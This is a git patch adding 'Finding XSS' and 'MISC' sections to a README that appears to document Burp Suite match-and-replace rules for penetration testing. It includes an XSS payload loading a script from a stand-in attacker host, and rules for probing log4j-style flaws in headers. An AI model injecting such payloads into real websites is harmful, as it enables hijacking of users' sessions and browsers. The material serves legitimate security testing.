From 7915fff6904f6619343ddd7cd4ede4b92413e0e5 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Thu, 5 May 2022 01:01:31 +0700
Subject: [PATCH] Update README.md

---
 README.md | 25 +++++++++++++++++++++++++
 1 file changed, 25 insertions(+)

diff --git a/README.md b/README.md
index e7ae483..f51ca6d 100644
--- a/README.md
+++ b/README.md
@@ -65,3 +65,28 @@ By changing original user UUID to another UUID
 <img src="https://user-images.githubusercontent.com/36522826/166742159-f740ec61-cb94-4ee7-bacf-7ed5b00e26bb.png" width="400" />
 
 > Create another rule but change the `type` to "Request First Line"
+
+## Finding XSS
+By adding some XSS payload into the request
+
+* Finding XSS on `User-Agent`
+
+<img src="https://user-images.githubusercontent.com/36522826/166749425-b9accf44-a606-473d-94c6-8e9562e02c07.png" width="400" />
+
+* Finding XSS on `Referer`
+
+<img src="https://user-images.githubusercontent.com/36522826/166749753-d68eea0a-e290-4658-a2f1-cf66fcd89342.png" width="400" />
+
+* Auto replace user input with XSS payload
+
+<img src="https://user-images.githubusercontent.com/36522826/166752610-9d21d86e-49e5-4e8f-86bc-a9134350d46d.png" width="400" />
+
+> So by just inputting the words `xss_payload` on the website it will be immediately replaced with `"><script src=https://attacker.com></script>`
+
+## MISC
+Some random match and replace rules
+* Finding CVE-2021-44221
+
+<img src="https://user-images.githubusercontent.com/36522826/166748175-6782ce51-b10f-4b1d-b8a3-610ef142d567.png" width="400" />
+
+> Create some another rules to look for them in headers, parameters and more. Because log4j can be found anywhere